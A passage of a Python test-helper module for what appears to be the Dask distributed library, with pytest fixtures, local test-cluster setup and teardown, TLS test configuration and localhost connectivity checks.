logging_levels = {
name: logger.level
for name, logger in logging.root.manager.loggerDict.items()
if isinstance(logger, logging.Logger)
}
_TEST_TIMEOUT = 30
_offload_executor.submit(lambda: None).result() # create thread during import
@pytest.fixture(scope="session")
def valid_python_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("file.py")
local_file.write("print('hello world!')")
return local_file
@pytest.fixture(scope="session")
def client_contract_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("distributed_script.py")
lines = (
"from distributed import Client",
"e = Client('127.0.0.1:8989')",
"print(e)",
)
local_file.write("\n".join(lines))
return local_file
@pytest.fixture(scope="session")
def invalid_python_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("file.py")
local_file.write("a+1")
return local_file
async def cleanup_global_workers():
for worker in Worker._instances:
await worker.close(report=False, executor_wait=False)
@pytest.fixture
def loop():
with check_instances():
with pristine_loop() as loop:
# Monkey-patch IOLoop.start to wait for loop stop
orig_start = loop.start
is_stopped = threading.Event()
is_stopped.set()
def start():
is_stopped.clear()
try:
orig_start()
finally:
is_stopped.set()
loop.start = start
yield loop
# Stop the loop in case it's still running
try:
sync(loop, cleanup_global_workers, callback_timeout=0.500)
loop.add_callback(loop.stop)
except RuntimeError as e:
if not re.match("IOLoop is clos(ed|ing)", str(e)):
raise
except TimeoutError:
pass
else:
is_stopped.wait()
@pytest.fixture
def loop_in_thread():
with pristine_loop() as loop:
thread = threading.Thread(target=loop.start, name="test IOLoop")
thread.daemon = True
thread.start()
loop_started = threading.Event()
loop.add_callback(loop_started.set)
loop_started.wait()
yield loop
loop.add_callback(loop.stop)
thread.join(timeout=5)
@pytest.fixture
def zmq_ctx():
import zmq
ctx = zmq.Context.instance()
yield ctx
ctx.destroy(linger=0)
@contextmanager
def pristine_loop():
IOLoop.clear_instance()
IOLoop.clear_current()
loop = IOLoop()
loop.make_current()
assert IOLoop.current() is loop
try:
yield loop
finally:
try:
loop.close(all_fds=True)
except (KeyError, ValueError):
pass
IOLoop.clear_instance()
IOLoop.clear_current()
@contextmanager
def mock_ipython():
from unittest import mock
from distributed._ipython_utils import remote_magic
ip = mock.Mock()
ip.user_ns = {}
ip.kernel = None
def get_ip():
return ip
with mock.patch("IPython.get_ipython", get_ip), mock.patch(
"distributed._ipython_utils.get_ipython", get_ip
):
yield ip
# cleanup remote_magic client cache
for kc in remote_magic._clients.values():
kc.stop_channels()
remote_magic._clients.clear()
original_config = copy.deepcopy(dask.config.config)
def reset_config():
dask.config.config.clear()
dask.config.config.update(copy.deepcopy(original_config))
def nodebug(func):
"""
A decorator to disable debug facilities during timing-sensitive tests.
Warning: this doesn't affect already created IOLoops.
"""
@functools.wraps(func)
def wrapped(*args, **kwargs):
old_asyncio_debug = os.environ.get("PYTHONASYNCIODEBUG")
if old_asyncio_debug is not None:
del os.environ["PYTHONASYNCIODEBUG"]
try:
return func(*args, **kwargs)
finally:
if old_asyncio_debug is not None:
os.environ["PYTHONASYNCIODEBUG"] = old_asyncio_debug
return wrapped
def nodebug_setup_module(module):
"""
A setup_module() that you can install in a test module to disable
debug facilities.
"""
module._old_asyncio_debug = os.environ.get("PYTHONASYNCIODEBUG")
if module._old_asyncio_debug is not None:
del os.environ["PYTHONASYNCIODEBUG"]
def nodebug_teardown_module(module):
"""
A teardown_module() that you can install in a test module to reenable
debug facilities.
"""
if module._old_asyncio_debug is not None:
os.environ["PYTHONASYNCIODEBUG"] = module._old_asyncio_debug
def inc(x):
return x + 1
def dec(x):
return x - 1
def mul(x, y):
return x * y
def div(x, y):
return x / y
def deep(n):
if n > 0:
return deep(n - 1)
else:
return True
def throws(x):
raise RuntimeError("hello!")
def double(x):
return x * 2
def slowinc(x, delay=0.02):
sleep(delay)
return x + 1
def slowdec(x, delay=0.02):
sleep(delay)
return x - 1
def slowdouble(x, delay=0.02):
sleep(delay)
return 2 * x
def randominc(x, scale=1):
from random import random
sleep(random() * scale)
return x + 1
def slowadd(x, y, delay=0.02):
sleep(delay)
return x + y
def slowsum(seq, delay=0.02):
sleep(delay)
return sum(seq)
def slowidentity(*args, **kwargs):
delay = kwargs.get("delay", 0.02)
sleep(delay)
if len(args) == 1:
return args[0]
else:
return args
class _UnhashableCallable:
# FIXME https://github.com/python/mypy/issues/4266
__hash__ = None # type: ignore
def __call__(self, x):
return x + 1
def run_for(duration, timer=time):
"""
Burn CPU for *duration* seconds.
"""
deadline = timer() + duration
while timer() <= deadline:
pass
# This dict grows at every varying() invocation
_varying_dict: defaultdict[str, int] = defaultdict(int)
_varying_key_gen = count()
class _ModuleSlot:
def __init__(self, modname, slotname):
self.modname = modname
self.slotname = slotname
def get(self):
return getattr(sys.modules[self.modname], self.slotname)
def varying(items):
"""
Return a function that returns a result (or raises an exception)
from *items* at each call.
"""
# cloudpickle would serialize the *values* of all globals
# used by *func* below, so we can't use `global <something>`.
# Instead look up the module by name to get the original namespace
# and not a copy.
slot = _ModuleSlot(__name__, "_varying_dict")
key = next(_varying_key_gen)
def func():
dct = slot.get()
i = dct[key]
if i == len(items):
raise IndexError
else:
x = items[i]
dct[key] = i + 1
if isinstance(x, Exception):
raise x
else:
return x
return func
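# Illustrative use of varying() (a sketch, not part of the original test suite):
# the returned callable replays the items in order, raising any Exception
# instances it encounters and raising IndexError once the items are exhausted.
#
#   func = varying([1, ValueError("boom"), 2])
#   func()  # -> 1
#   func()  # raises ValueError("boom")
#   func()  # -> 2
#   func()  # raises IndexError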
def map_varying(itemslists):
"""
Like *varying*, but return the full specification for a map() call
on multiple items lists.
"""
def apply(func, *args, **kwargs):
return func(*args, **kwargs)
return apply, list(map(varying, itemslists))
async def geninc(x, delay=0.02):
await asyncio.sleep(delay)
return x + 1
async def asyncinc(x, delay=0.02):
await asyncio.sleep(delay)
return x + 1
_readone_queues: dict[Any, asyncio.Queue] = {}
async def readone(comm):
"""
Read one message at a time from a comm that reads lists of
messages.
"""
try:
q = _readone_queues[comm]
except KeyError:
q = _readone_queues[comm] = asyncio.Queue()
async def background_read():
while True:
try:
messages = await comm.read()
except CommClosedError:
break
for msg in messages:
q.put_nowait(msg)
q.put_nowait(None)
del _readone_queues[comm]
        # Schedule the reader as a background task; a bare call would only
        # create the coroutine object without ever running it.
        asyncio.ensure_future(background_read())
msg = await q.get()
if msg is None:
raise CommClosedError
else:
return msg
def run_scheduler(q, nputs, config, port=0, **kwargs):
with dask.config.set(config):
from distributed import Scheduler
# On Python 2.7 and Unix, fork() is used to spawn child processes,
# so avoid inheriting the parent's IO loop.
with pristine_loop() as loop:
async def _():
scheduler = await Scheduler(
validate=True, host="127.0.0.1", port=port, **kwargs
)
for i in range(nputs):
q.put(scheduler.address)
await scheduler.finished()
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
def run_worker(q, scheduler_q, config, **kwargs):
with dask.config.set(config):
from distributed import Worker
reset_logger_locks()
with log_errors():
with pristine_loop() as loop:
scheduler_addr = scheduler_q.get()
async def _():
worker = await Worker(scheduler_addr, validate=True, **kwargs)
q.put(worker.address)
await worker.finished()
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
def run_nanny(q, scheduler_q, config, **kwargs):
with dask.config.set(config):
with log_errors():
with pristine_loop() as loop:
scheduler_addr = scheduler_q.get()
async def _():
worker = await Nanny(scheduler_addr, validate=True, **kwargs)
q.put(worker.address)
await worker.finished()
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
@contextmanager
def check_active_rpc(loop, active_rpc_timeout=1):
active_before = set(rpc.active)
yield
# Some streams can take a bit of time to notice their peer
# has closed, and keep a coroutine (*) waiting for a CommClosedError
    # before calling close_rpc().
# This would happen especially if a non-localhost address is used,
# as Nanny does.
# (*) (example: gather_from_workers())
def fail():
pytest.fail(
"some RPCs left active by test: %s" % (set(rpc.active) - active_before)
)
async def wait():
await async_wait_for(
lambda: len(set(rpc.active) - active_before) == 0,
timeout=active_rpc_timeout,
fail_func=fail,
)
loop.run_sync(wait)
@pytest.fixture
def cluster_fixture(loop):
with cluster() as (scheduler, workers):
yield (scheduler, workers)
@pytest.fixture
def s(cluster_fixture):
scheduler, workers = cluster_fixture
return scheduler
@pytest.fixture
def a(cluster_fixture):
scheduler, workers = cluster_fixture
return workers[0]
@pytest.fixture
def b(cluster_fixture):
scheduler, workers = cluster_fixture
return workers[1]
@pytest.fixture
def client(loop, cluster_fixture):
scheduler, workers = cluster_fixture
with Client(scheduler["address"], loop=loop) as client:
yield client
# Compatibility. A lot of tests simply use `c` as fixture name
c = client
@pytest.fixture
def client_secondary(loop, cluster_fixture):
scheduler, workers = cluster_fixture
with Client(scheduler["address"], loop=loop) as client:
yield client
@contextmanager
def tls_cluster_context(
worker_kwargs=None, scheduler_kwargs=None, security=None, **kwargs
):
security = security or tls_only_security()
worker_kwargs = assoc(worker_kwargs or {}, "security", security)
scheduler_kwargs = assoc(scheduler_kwargs or {}, "security", security)
with cluster(
worker_kwargs=worker_kwargs, scheduler_kwargs=scheduler_kwargs, **kwargs
) as (s, workers):
yield s, workers
@pytest.fixture
def tls_cluster(loop, security):
with tls_cluster_context(security=security) as (scheduler, workers):
yield (scheduler, workers)
@pytest.fixture
def tls_client(tls_cluster, loop, security):
s, workers = tls_cluster
with Client(s["address"], security=security, loop=loop) as client:
yield client
@pytest.fixture
def security():
return tls_only_security()
@contextmanager
def cluster(
nworkers=2,
nanny=False,
worker_kwargs={},
active_rpc_timeout=10,
disconnect_timeout=20,
scheduler_kwargs={},
config={},
):
ws = weakref.WeakSet()
enable_proctitle_on_children()
with clean(timeout=active_rpc_timeout, threads=False) as loop:
if nanny:
_run_worker = run_nanny
else:
_run_worker = run_worker
# The scheduler queue will receive the scheduler's address
scheduler_q = mp_context.Queue()
# Launch scheduler
scheduler = mp_context.Process(
name="Dask cluster test: Scheduler",
target=run_scheduler,
args=(scheduler_q, nworkers + 1, config),
kwargs=scheduler_kwargs,
)
ws.add(scheduler)
scheduler.daemon = True
scheduler.start()
# Launch workers
workers = []
for i in range(nworkers):
q = mp_context.Queue()
fn = "_test_worker-%s" % uuid.uuid4()
kwargs = merge(
{
"nthreads": 1,
"local_directory": fn,
"memory_limit": system.MEMORY_LIMIT,
},
worker_kwargs,
)
proc = mp_context.Process(
name="Dask cluster test: Worker",
target=_run_worker,
args=(q, scheduler_q, config),
kwargs=kwargs,
)
ws.add(proc)
workers.append({"proc": proc, "queue": q, "dir": fn})
for worker in workers:
worker["proc"].start()
try:
for worker in workers:
worker["address"] = worker["queue"].get(timeout=5)
except queue.Empty:
pytest.xfail("Worker failed to start in test")
saddr = scheduler_q.get()
start = time()
try:
try:
security = scheduler_kwargs["security"]
rpc_kwargs = {"connection_args": security.get_connection_args("client")}
except KeyError:
rpc_kwargs = {}
with rpc(saddr, **rpc_kwargs) as s:
while True:
nthreads = loop.run_sync(s.ncores)
if len(nthreads) == nworkers:
break
if time() - start > 5:
raise Exception("Timeout on cluster creation")
# avoid sending processes down to function
yield {"address": saddr}, [
{"address": w["address"], "proc": weakref.ref(w["proc"])}
for w in workers
]
finally:
logger.debug("Closing out test cluster")
loop.run_sync(
lambda: disconnect_all(
[w["address"] for w in workers],
timeout=disconnect_timeout,
rpc_kwargs=rpc_kwargs,
)
)
loop.run_sync(
lambda: disconnect(
saddr, timeout=disconnect_timeout, rpc_kwargs=rpc_kwargs
)
)
scheduler.terminate()
scheduler_q.close()
scheduler_q._reader.close()
scheduler_q._writer.close()
for w in workers:
w["proc"].terminate()
w["queue"].close()
w["queue"]._reader.close()
w["queue"]._writer.close()
scheduler.join(2)
del scheduler
for proc in [w["proc"] for w in workers]:
proc.join(timeout=30)
with suppress(UnboundLocalError):
del worker, w, proc
del workers[:]
for fn in glob("_test_worker-*"):
with suppress(OSError):
shutil.rmtree(fn)
try:
client = default_client()
except ValueError:
pass
else:
client.close()
start = time()
while any(proc.is_alive() for proc in ws):
text = str(list(ws))
sleep(0.2)
assert time() < start + 5, ("Workers still around after five seconds", text)
async def disconnect(addr, timeout=3, rpc_kwargs=None):
rpc_kwargs = rpc_kwargs or {}
async def do_disconnect():
with rpc(addr, **rpc_kwargs) as w:
# If the worker was killed hard (e.g. sigterm) during test runtime,
# we do not know at this point and may not be able to connect
with suppress(EnvironmentError, CommClosedError):
# Do not request a reply since comms will be closed by the
# worker before a reply can be made and we will always trigger
# the timeout
await w.terminate(reply=False)
await asyncio.wait_for(do_disconnect(), timeout=timeout)
async def disconnect_all(addresses, timeout=3, rpc_kwargs=None):
await asyncio.gather(*(disconnect(addr, timeout, rpc_kwargs) for addr in addresses))
def gen_test(timeout: float = _TEST_TIMEOUT) -> Callable[[Callable], Callable]:
"""Coroutine test
@pytest.mark.parametrize("param", [1, 2, 3])
@gen_test(timeout=5)
    async def test_foo(param):
await ... # use tornado coroutines
@gen_test(timeout=5)
async def test_foo():
await ... # use tornado coroutines
"""
    assert timeout, (
        "timeout should always be set and it should be smaller than the global one from"
        " pytest-timeout"
)
def _(func):
def test_func(*args, **kwargs):
with clean() as loop:
injected_func = functools.partial(func, *args, **kwargs)
if iscoroutinefunction(func):
cor = injected_func
else:
cor = gen.coroutine(injected_func)
loop.run_sync(cor, timeout=timeout)
# Patch the signature so pytest can inject fixtures
test_func.__signature__ = inspect.signature(func)
return test_func
return _
async def start_cluster(
nthreads: list[tuple[str, int] | tuple[str, int, dict]],
scheduler_addr: str,
loop: IOLoop,
security: Security | dict[str, Any] | None = None,
Worker: type[ServerNode] = Worker,
scheduler_kwargs: dict[str, Any] = {},
worker_kwargs: dict[str, Any] = {},
) -> tuple[Scheduler, list[ServerNode]]:
s = await Scheduler(
loop=loop,
validate=True,
security=security,
port=0,
host=scheduler_addr,
**scheduler_kwargs,
)
workers = [
Worker(
s.address,
nthreads=ncore[1],
name=i,
security=security,
loop=loop,
validate=True,
host=ncore[0],
**(
merge(worker_kwargs, ncore[2]) # type: ignore
if len(ncore) > 2
else worker_kwargs
),
)
for i, ncore in enumerate(nthreads)
]
await asyncio.gather(*workers)
start = time()
while (
len(s.workers) < len(nthreads)
or any(ws.status != Status.running for ws in s.workers.values())
or any(comm.comm is None for comm in s.stream_comms.values())
):
await asyncio.sleep(0.01)
if time() > start + 30:
await asyncio.gather(*(w.close(timeout=1) for w in workers))
await s.close(fast=True)
raise TimeoutError("Cluster creation timeout")
return s, workers
async def end_cluster(s, workers):
logger.debug("Closing out test cluster")
async def end_worker(w):
with suppress(TimeoutError, CommClosedError, EnvironmentError):
await w.close(report=False)
await asyncio.gather(*(end_worker(w) for w in workers))
await s.close() # wait until scheduler stops completely
s.stop()
def gen_cluster(
nthreads: list[tuple[str, int] | tuple[str, int, dict]] = [
("127.0.0.1", 1),
("127.0.0.1", 2),
],
scheduler="127.0.0.1",
timeout: float = _TEST_TIMEOUT,
security: Security | dict[str, Any] | None = None,
Worker: type[ServerNode] = Worker,
client: bool = False,
scheduler_kwargs: dict[str, Any] = {},
worker_kwargs: dict[str, Any] = {},
client_kwargs: dict[str, Any] = {},
active_rpc_timeout: float = 1,
config: dict[str, Any] = {},
clean_kwargs: dict[str, Any] = {},
allow_unclosed: bool = False,
cluster_dump_directory: str | Literal[False] = "test_cluster_dump",
) -> Callable[[Callable], Callable]:
from distributed import Client
""" Coroutine test with small cluster
@gen_cluster()
async def test_foo(scheduler, worker1, worker2):
await ... # use tornado coroutines
@pytest.mark.parametrize("param", [1, 2, 3])
@gen_cluster()
async def test_foo(scheduler, worker1, worker2, param):
await ... # use tornado coroutines
@gen_cluster()
async def test_foo(scheduler, worker1, worker2, pytest_fixture_a, pytest_fixture_b):
await ... # use tornado coroutines
See also:
start
end
"""
    assert timeout, (
        "timeout should always be set and it should be smaller than the global one from"
        " pytest-timeout"
)
scheduler_kwargs = merge(
{"dashboard": False, "dashboard_address": ":0"}, scheduler_kwargs
)
worker_kwargs = merge(
{"memory_limit": system.MEMORY_LIMIT, "death_timeout": 15}, worker_kwargs
)
def _(func):
if not iscoroutinefunction(func):
raise RuntimeError("gen_cluster only works for coroutine functions.")
@functools.wraps(func)
def test_func(*outer_args, **kwargs):
result = None
workers = []
with clean(timeout=active_rpc_timeout, **clean_kwargs) as loop:
async def coro():
with dask.config.set(config):
s = False
for _ in range(60):
try:
s, ws = await start_cluster(
nthreads,
scheduler,
loop,
security=security,
Worker=Worker,
scheduler_kwargs=scheduler_kwargs,
worker_kwargs=worker_kwargs,
)
except Exception as e:
logger.error(
"Failed to start gen_cluster: "
f"{e.__class__.__name__}: {e}; retrying",
exc_info=True,
)
await asyncio.sleep(1)
else:
workers[:] = ws
args = [s] + workers
break
if s is False:
raise Exception("Could not start cluster")
if client:
c = await Client(
s.address,
loop=loop,
security=security,
asynchronous=True,
**client_kwargs,
)
args = [c] + args
try:
coro = func(*args, *outer_args, **kwargs)
task = asyncio.create_task(coro)
coro2 = asyncio.wait_for(asyncio.shield(task), timeout)
result = await coro2
if s.validate:
s.validate_state()
except asyncio.TimeoutError:
assert task
buffer = io.StringIO()
# This stack indicates where the coro/test is suspended
task.print_stack(file=buffer)
if cluster_dump_directory:
await dump_cluster_state(
s,
ws,
output_dir=cluster_dump_directory,
func_name=func.__name__,
)
task.cancel()
while not task.cancelled():
await asyncio.sleep(0.01)
# Remove as much of the traceback as possible; it's
# uninteresting boilerplate from utils_test and asyncio and
# not from the code being tested.
raise TimeoutError(
f"Test timeout after {timeout}s.\n"
"========== Test stack trace starts here ==========\n"
f"{buffer.getvalue()}"
) from None
except pytest.xfail.Exception:
raise
except Exception:
if cluster_dump_directory and not has_pytestmark(
test_func, "xfail"
):
await dump_cluster_state(
s,
ws,
output_dir=cluster_dump_directory,
func_name=func.__name__,
)
raise
finally:
if client and c.status not in ("closing", "closed"):
await c._close(fast=s.status == Status.closed)
await end_cluster(s, workers)
await asyncio.wait_for(cleanup_global_workers(), 1)
try:
c = await default_client()
except ValueError:
pass
else:
await c._close(fast=True)
def get_unclosed():
return [c for c in Comm._instances if not c.closed()] + [
c
for c in _global_clients.values()
if c.status != "closed"
]
try:
start = time()
while time() < start + 60:
gc.collect()
if not get_unclosed():
break
await asyncio.sleep(0.05)
else:
if allow_unclosed:
print(f"Unclosed Comms: {get_unclosed()}")
else:
raise RuntimeError("Unclosed Comms", get_unclosed())
finally:
Comm._instances.clear()
_global_clients.clear()
return result
result = loop.run_sync(
coro, timeout=timeout * 2 if timeout else timeout
)
for w in workers:
if getattr(w, "data", None):
try:
w.data.clear()
except OSError:
# zict backends can fail if their storage directory
# was already removed
pass
del w.data
return result
# Patch the signature so pytest can inject fixtures
orig_sig = inspect.signature(func)
args = [None] * (1 + len(nthreads)) # scheduler, *workers
if client:
args.insert(0, None)
bound = orig_sig.bind_partial(*args)
test_func.__signature__ = orig_sig.replace(
parameters=[
p
for name, p in orig_sig.parameters.items()
if name not in bound.arguments
]
)
return test_func
return _
async def dump_cluster_state(
s: Scheduler, ws: list[ServerNode], output_dir: str, func_name: str
) -> None:
"""A variant of Client.dump_cluster_state, which does not rely on any of the below
to work:
- Having a client at all
- Client->Scheduler comms
- Scheduler->Worker comms (unless using Nannies)
"""
scheduler_info = s._to_dict()
workers_info: dict[str, Any]
versions_info = version_module.get_versions()
if not ws or isinstance(ws[0], Worker):
workers_info = {w.address: w._to_dict() for w in ws}
else:
workers_info = await s.broadcast(msg={"op": "dump_state"}, on_error="return")
workers_info = {
k: repr(v) if isinstance(v, Exception) else v
for k, v in workers_info.items()
}
state = {
"scheduler": scheduler_info,
"workers": workers_info,
"versions": versions_info,
}
os.makedirs(output_dir, exist_ok=True)
fname = os.path.join(output_dir, func_name) + ".yaml"
with open(fname, "w") as fh:
yaml.safe_dump(state, fh) # Automatically convert tuples to lists
print(f"Dumped cluster state to {fname}")
def raises(func, exc=Exception):
try:
func()
return False
except exc:
return True
def _terminate_process(proc):
if proc.poll() is None:
if sys.platform.startswith("win"):
proc.send_signal(signal.CTRL_BREAK_EVENT)
else:
proc.send_signal(signal.SIGINT)
try:
proc.wait(30)
finally:
# Make sure we don't leave the process lingering around
with suppress(OSError):
proc.kill()
@contextmanager
def popen(args, **kwargs):
kwargs["stdout"] = subprocess.PIPE
kwargs["stderr"] = subprocess.PIPE
if sys.platform.startswith("win"):
# Allow using CTRL_C_EVENT / CTRL_BREAK_EVENT
kwargs["creationflags"] = subprocess.CREATE_NEW_PROCESS_GROUP
dump_stdout = False
args = list(args)
if sys.platform.startswith("win"):
args[0] = os.path.join(sys.prefix, "Scripts", args[0])
else:
args[0] = os.path.join(
os.environ.get("DESTDIR", "") + sys.prefix, "bin", args[0]
)
proc = subprocess.Popen(args, **kwargs)
try:
yield proc
except Exception:
dump_stdout = True
raise
finally:
try:
_terminate_process(proc)
finally:
# XXX Also dump stdout if return code != 0 ?
out, err = proc.communicate()
if dump_stdout:
            print("\n\nPrint from stderr\n %s\n=================\n" % args[0])
print(err.decode())
print("\n\nPrint from stdout\n=================\n")
print(out.decode())
def wait_for(predicate, timeout, fail_func=None, period=0.001):
deadline = time() + timeout
while not predicate():
sleep(period)
if time() > deadline:
if fail_func is not None:
fail_func()
            pytest.fail(f"condition not reached within {timeout} seconds")
async def async_wait_for(predicate, timeout, fail_func=None, period=0.001):
deadline = time() + timeout
while not predicate():
await asyncio.sleep(period)
if time() > deadline:
if fail_func is not None:
fail_func()
            pytest.fail(f"condition not reached within {timeout} seconds")
@memoize
def has_ipv6():
"""
Return whether IPv6 is locally functional. This doesn't guarantee IPv6
is properly configured outside of localhost.
"""
if os.getenv("DISABLE_IPV6") == "1":
return False
serv = cli = None
try:
serv = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
serv.bind(("::", 0))
serv.listen(5)
cli = socket.create_connection(serv.getsockname()[:2])
return True
except OSError:
return False
finally:
if cli is not None:
cli.close()
if serv is not None:
serv.close()
if has_ipv6():
def requires_ipv6(test_func):
return test_func
else:
requires_ipv6 = pytest.mark.skip("ipv6 required")
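# Usage sketch: decorate tests that need local IPv6 support so they are skipped
# automatically on hosts without it, e.g.
#
#   @requires_ipv6
#   def test_listen_on_ipv6():
#       ...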
async def assert_can_connect(addr, timeout=0.5, **kwargs):
"""
Check that it is possible to connect to the distributed *addr*
within the given *timeout*.
"""
comm = await connect(addr, timeout=timeout, **kwargs)
comm.abort()
async def assert_cannot_connect(
addr, timeout=0.5, exception_class=EnvironmentError, **kwargs
):
"""
Check that it is impossible to connect to the distributed *addr*
within the given *timeout*.
"""
with pytest.raises(exception_class):
comm = await connect(addr, timeout=timeout, **kwargs)
comm.abort()
async def assert_can_connect_from_everywhere_4_6(port, protocol="tcp", **kwargs):
"""
Check that the local *port* is reachable from all IPv4 and IPv6 addresses.
"""
futures = [
assert_can_connect("%s://127.0.0.1:%d" % (protocol, port), **kwargs),
assert_can_connect("%s://%s:%d" % (protocol, get_ip(), port), **kwargs),
]
if has_ipv6():
futures += [
assert_can_connect("%s://[::1]:%d" % (protocol, port), **kwargs),
assert_can_connect("%s://[%s]:%d" % (protocol, get_ipv6(), port), **kwargs),
]
await asyncio.gather(*futures)
async def assert_can_connect_from_everywhere_4(port, protocol="tcp", **kwargs):
"""
Check that the local *port* is reachable from all IPv4 addresses.
"""
futures = [
assert_can_connect("%s://127.0.0.1:%d" % (protocol, port), **kwargs),
assert_can_connect("%s://%s:%d" % (protocol, get_ip(), port), **kwargs),
]
if has_ipv6():
futures += [
assert_cannot_connect("%s://[::1]:%d" % (protocol, port), **kwargs),
assert_cannot_connect(
"%s://[%s]:%d" % (protocol, get_ipv6(), port), **kwargs
),
]
await asyncio.gather(*futures)
async def assert_can_connect_locally_4(port, **kwargs):
"""
Check that the local *port* is only reachable from local IPv4 addresses.
"""
futures = [assert_can_connect("tcp://127.0.0.1:%d" % port, **kwargs)]
if get_ip() != "127.0.0.1": # No outside IPv4 connectivity?
futures += [assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs)]
if has_ipv6():
futures += [
assert_cannot_connect("tcp://[::1]:%d" % port, **kwargs),
assert_cannot_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs),
]
await asyncio.gather(*futures)
async def assert_can_connect_from_everywhere_6(port, **kwargs):
"""
Check that the local *port* is reachable from all IPv6 addresses.
"""
assert has_ipv6()
futures = [
assert_cannot_connect("tcp://127.0.0.1:%d" % port, **kwargs),
assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs),
assert_can_connect("tcp://[::1]:%d" % port, **kwargs),
assert_can_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs),
]
await asyncio.gather(*futures)
async def assert_can_connect_locally_6(port, **kwargs):
"""
Check that the local *port* is only reachable from local IPv6 addresses.
"""
assert has_ipv6()
futures = [
assert_cannot_connect("tcp://127.0.0.1:%d" % port, **kwargs),
assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs),
assert_can_connect("tcp://[::1]:%d" % port, **kwargs),
]
if get_ipv6() != "::1": # No outside IPv6 connectivity?
futures += [
assert_cannot_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs)
]
await asyncio.gather(*futures)
@contextmanager
def captured_logger(logger, level=logging.INFO, propagate=None):
"""Capture output from the given Logger."""
if isinstance(logger, str):
logger = logging.getLogger(logger)
orig_level = logger.level
orig_handlers = logger.handlers[:]
if propagate is not None:
orig_propagate = logger.propagate
logger.propagate = propagate
sio = io.StringIO()
logger.handlers[:] = [logging.StreamHandler(sio)]
logger.setLevel(level)
try:
yield sio
finally:
logger.handlers[:] = orig_handlers
logger.setLevel(orig_level)
if propagate is not None:
logger.propagate = orig_propagate
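# Typical use in a test (a sketch; the logger name and message are assumptions):
#
#   with captured_logger("distributed.scheduler") as sio:
#       ...  # code that is expected to log at INFO or above
#   assert "expected message" in sio.getvalue()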
@contextmanager
def captured_handler(handler):
"""Capture output from the given logging.StreamHandler."""
assert isinstance(handler, logging.StreamHandler)
orig_stream = handler.stream
handler.stream = io.StringIO()
try:
yield handler.stream
finally:
handler.stream = orig_stream
@contextmanager
def new_config(new_config):
"""
Temporarily change configuration dictionary.
"""
from .config import defaults
config = dask.config.config
orig_config = copy.deepcopy(config)
try:
config.clear()
config.update(copy.deepcopy(defaults))
dask.config.update(config, new_config)
initialize_logging(config)
yield
finally:
config.clear()
config.update(orig_config)
initialize_logging(config)
@contextmanager
def new_environment(changes):
saved_environ = os.environ.copy()
os.environ.update(changes)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
@contextmanager
def new_config_file(c):
"""
Temporarily change configuration file to match dictionary *c*.
"""
import yaml
old_file = os.environ.get("DASK_CONFIG")
fd, path = tempfile.mkstemp(prefix="dask-config")
try:
with os.fdopen(fd, "w") as f:
f.write(yaml.dump(c))
os.environ["DASK_CONFIG"] = path
try:
yield
finally:
if old_file:
os.environ["DASK_CONFIG"] = old_file
else:
del os.environ["DASK_CONFIG"]
finally:
os.remove(path)
certs_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), "tests"))
def get_cert(filename):
"""
Get the path to one of the test TLS certificates.
"""
path = os.path.join(certs_dir, filename)
assert os.path.exists(path), path
return path
def tls_config():
"""
A functional TLS configuration with our test certs.
"""
ca_file = get_cert("tls-ca-cert.pem")
keycert = get_cert("tls-key-cert.pem")
return {
"distributed": {
"comm": {
"tls": {
"ca-file": ca_file,
"client": {"cert": keycert},
"scheduler": {"cert": keycert},
"worker": {"cert": keycert},
}
}
}
}
def tls_only_config():
"""
A functional TLS configuration with our test certs, disallowing
plain TCP communications.
"""
c = tls_config()
c["distributed"]["comm"]["require-encryption"] = True
return c
def tls_security():
"""
A Security object with proper TLS configuration.
"""
with new_config(tls_config()):
sec = Security()
return sec
def tls_only_security():
"""
A Security object with proper TLS configuration and disallowing plain
TCP communications.
"""
with new_config(tls_only_config()):
sec = Security()
assert sec.require_encryption
return sec
def get_server_ssl_context(
certfile="tls-cert.pem", keyfile="tls-key.pem", ca_file="tls-ca-cert.pem"
):
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH, cafile=get_cert(ca_file))
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_cert_chain(get_cert(certfile), get_cert(keyfile))
return ctx
def get_client_ssl_context(
certfile="tls-cert.pem", keyfile="tls-key.pem", ca_file="tls-ca-cert.pem"
):
ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH, cafile=get_cert(ca_file))
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_cert_chain(get_cert(certfile), get_cert(keyfile))
return ctx
def bump_rlimit(limit, desired):
resource = pytest.importorskip("resource")
try:
soft, hard = resource.getrlimit(limit)
if soft < desired:
resource.setrlimit(limit, (desired, max(hard, desired)))
except Exception as e:
pytest.skip(f"rlimit too low ({soft}) and can't be increased: {e}")
def gen_tls_cluster(**kwargs):
kwargs.setdefault("nthreads", [("tls://127.0.0.1", 1), ("tls://127.0.0.1", 2)])
return gen_cluster(
scheduler="tls://127.0.0.1", security=tls_only_security(), **kwargs
)
@contextmanager
def save_sys_modules():
    # Take copies so that entries added while the context is active can be
    # detected and removed afterwards.
    old_modules = sys.modules.copy()
    old_path = list(sys.path)
    try:
        yield
    finally:
        # Iterate over snapshots; deleting from the live list/dict while
        # iterating over it would skip entries or raise RuntimeError.
        for i, elem in reversed(list(enumerate(sys.path))):
            if elem not in old_path:
                del sys.path[i]
        for elem in list(sys.modules):
            if elem not in old_modules:
                del sys.modules[elem]
@contextmanager
def check_thread_leak():
"""Context manager to ensure we haven't leaked any threads"""
# "TCP-Executor" threads are never stopped once they are started
BaseTCPConnector.warmup()
active_threads_start = threading.enumerate()
yield
start = time()
while True:
bad_threads = [
thread
for thread in threading.enumerate()
if thread not in active_threads_start
# FIXME this looks like a genuine leak that needs fixing
and "watch message queue" not in thread.name
